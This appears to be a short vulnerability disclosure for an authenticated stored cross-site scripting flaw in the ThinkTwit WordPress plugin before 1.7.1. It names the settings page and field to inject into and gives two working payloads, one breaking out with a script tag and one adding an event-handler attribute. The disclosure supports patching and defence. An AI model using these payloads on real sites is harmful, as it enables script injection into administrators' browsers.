ThinkTwit < 1.7.1 - Authenticated Stored Cross-Site Scripting (XSS)

Put the following payload in the "Consumer key" setting of the plugin (/wp-admin/options-general.php?page=thinktwit):
- v < 1.6.7 : "><script>alert(/XSS/)</script>
- v < 1.7.1 : " style=animation-name:rotation onanimationstart=alert(/XSS/)//